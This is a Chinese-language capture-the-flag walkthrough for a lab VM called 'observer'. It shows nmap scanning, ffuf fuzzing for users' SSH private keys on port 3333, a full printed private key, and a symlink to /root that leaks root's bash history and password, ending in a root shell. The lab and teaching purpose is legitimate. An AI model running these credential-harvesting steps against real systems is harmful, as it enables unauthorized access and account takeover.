难度:easy
kali:192.168.56.104
靶机:192.168.56.153
刚打开靶机,我想用浏览器打开web看一下,发现怎么也打不开,甚至怀疑了我的网络问题……端口扫了一下发现没开放80端口
端口扫描
┌──(root㉿kali2)-[~/Desktop]
└─# nmap 192.168.56.153
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-16 20:18 CST
Nmap scan report for 192.168.56.153
Host is up (0.000094s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
3333/tcp open dec-notes
MAC Address: 08:00:27:F1:30:90 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds开了个3333端口,也不知道扫描服务,搜索引擎搜了一下说是存在Prosiak木马,不了解,后面也确实没用到
用户名fuzz
进入3333端口看一下
下面一串奇怪的东西,当前目录在home目录下,可以尝试fuzz一下用户名
┌──(root㉿kali2)-[~/Desktop]
└─# ffuf -w /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -u http://192.168.56.153:3333/FUZZ/.ssh/id_rsa -fw 8
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://192.168.56.153:3333/FUZZ/.ssh/id_rsa
:: Wordlist : FUZZ: /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response words: 8
________________________________________________
jan [Status: 200, Size: 2602, Words: 7, Lines: 39, Duration: 4ms]
Marc%20Ludlum [Status: 200, Size: 101, Words: 9, Lines: 4, Duration: 9ms]fuzz到一个用户名jan并且可以访问他的ssh私钥
wget下来并用私钥连接,注意改权限为600
┌──(root㉿kali2)-[~/Desktop]
└─# wget http://192.168.56.153:3333/jan/.ssh/id_rsa
--2024-04-16 20:29:24-- http://192.168.56.153:3333/jan/.ssh/id_rsa
Connecting to 192.168.56.153:3333... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/plain]
Saving to: ‘id_rsa’
id_rsa [ <=> ] 2.54K --.-KB/s in 0s
2024-04-16 20:29:24 (205 MB/s) - ‘id_rsa’ saved [2602]
┌──(root㉿kali2)-[~/Desktop]
└─# cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
┌──(root㉿kali2)-[~/Desktop]
└─# ssh jan@192.168.56.153 -i id_rsa
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "id_rsa": bad permissions
jan@192.168.56.153's password:
┌──(root㉿kali2)-[~/Desktop]
└─# chmod 600 id_rsa
┌──(root㉿kali2)-[~/Desktop]
└─# ssh jan@192.168.56.153 -i id_rsa
Linux observer 6.1.0-11-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.38-4 (2023-08-08) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Apr 16 14:05:12 2024 from 192.168.56.104
jan@observer:~$ 直接拿到了jan的权限
提权root
sudo -l
sudo -l确实有东西
jan@observer:~$ sudo -l
Matching Defaults entries for jan on observer:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User jan may run the following commands on observer:
(ALL) NOPASSWD: /usr/bin/systemctl -l status但是我利用的时候出现了问题,发现并不能直接输入!bash或者!sh拿到root权限
jan@observer:~$ sudo /usr/bin/systemctl -l status
● observer
State: running
Units: 236 loaded (incl. loaded aliases)
Jobs: 0 queued
Failed: 0 units
Since: Tue 2024-04-16 13:43:02 CEST; 49min ago
systemd: 252.12-1~deb12u1
CGroup: /
├─init.scope
│ └─1 /sbin/init
├─system.slice
│ ├─cron.service
│ │ ├─315 /usr/sbin/cron -f
│ │ ├─322 /usr/sbin/CRON -f
│ │ ├─333 /bin/sh -c /opt/observer
│ │ └─336 /opt/observer
│ ├─dbus.service
│ │ └─318 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
│ ├─ifup@enp0s3.service
│ │ └─416 dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3
│ ├─ssh.service
│ │ └─410 "sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups"
│ ├─system-getty.slice
│ │ └─getty@tty1.service
│ │ └─344 /sbin/agetty -o "-p -- \\u" --noclear - linux
│ ├─systemd-journald.service
│ │ └─207 /lib/systemd/systemd-journald
│ ├─systemd-logind.service
│ │ └─323 /lib/systemd/systemd-logind
│ ├─systemd-timesyncd.service
│ │ └─255 /lib/systemd/systemd-timesyncd
│ └─systemd-udevd.service
│ └─udev
│ └─239 /lib/systemd/systemd-udevd
└─user.slice
└─user-1000.slice
├─session-2.scope
│ ├─518 "sshd: jan [priv]"
│ ├─533 "sshd: jan@pts/0"
│ ├─534 -bash
│ ├─551 /usr/bin/systemctl -l
│ ├─552 pager
│ ├─553 sh -c "/bin/bash -c bash"
│ ├─554 bash
│ ├─643 su root
│ └─644 bash
├─session-5.scope
│ ├─670 "sshd: jan [priv]"
│ ├─676 "sshd: jan@pts/1"
│ ├─677 -bash
│ ├─687 sudo /usr/bin/systemctl -l status
│ ├─688 sudo /usr/bin/systemctl -l status
│ ├─689 /usr/bin/systemctl -l status
│ └─690 less
└─user@1000.service
└─init.scope
├─521 /lib/systemd/systemd --user
└─523 "(sd-pam)"这里提权巧妙,也是试了好多次才出来
软连接
jan@observer:~$ ls -al
total 40
drwx------ 4 jan jan 4096 abr 16 14:34 .
drwxr-xr-x 3 root root 4096 ago 21 2023 ..
-rw------- 1 jan jan 133 ago 21 2023 .bash_history
-rw-r--r-- 1 jan jan 220 ago 21 2023 .bash_logout
-rw-r--r-- 1 jan jan 3526 ago 21 2023 .bashrc
drwxr-xr-x 3 jan jan 4096 ago 21 2023 .local
-rw-r--r-- 1 jan jan 807 ago 21 2023 .profile
drwx------ 2 jan jan 4096 ago 21 2023 .ssh
-rw------- 1 jan jan 24 ago 21 2023 user.txt
-rw------- 1 jan jan 54 ago 21 2023 .Xauthority我是看到jan用户可以读取.bash_history就想可不可以软连接到/root/.bash_history,事实证明确实可以
直接软连接到/bash/.bash_hitory不行,软连接到/root然后在web中访问目录就能拿到root的历史指令
jan@observer:~$ ln -s /root root
jan@observer:~$ ls -al
total 40
drwx------ 4 jan jan 4096 abr 16 14:37 .
drwxr-xr-x 3 root root 4096 ago 21 2023 ..
-rw------- 1 jan jan 133 ago 21 2023 .bash_history
-rw-r--r-- 1 jan jan 220 ago 21 2023 .bash_logout
-rw-r--r-- 1 jan jan 3526 ago 21 2023 .bashrc
drwxr-xr-x 3 jan jan 4096 ago 21 2023 .local
-rw-r--r-- 1 jan jan 807 ago 21 2023 .profile
lrwxrwxrwx 1 jan jan 5 abr 16 14:37 root -> /root
drwx------ 2 jan jan 4096 ago 21 2023 .ssh
-rw------- 1 jan jan 24 ago 21 2023 user.txt
-rw------- 1 jan jan 54 ago 21 2023 .Xauthority
历史指令泄露了root的密码,用这个密码直接su到root就拿到了root了
jan@observer:~$ su root
Contraseña:
root@observer:/home/jan# id
uid=0(root) gid=0(root) grupos=0(root)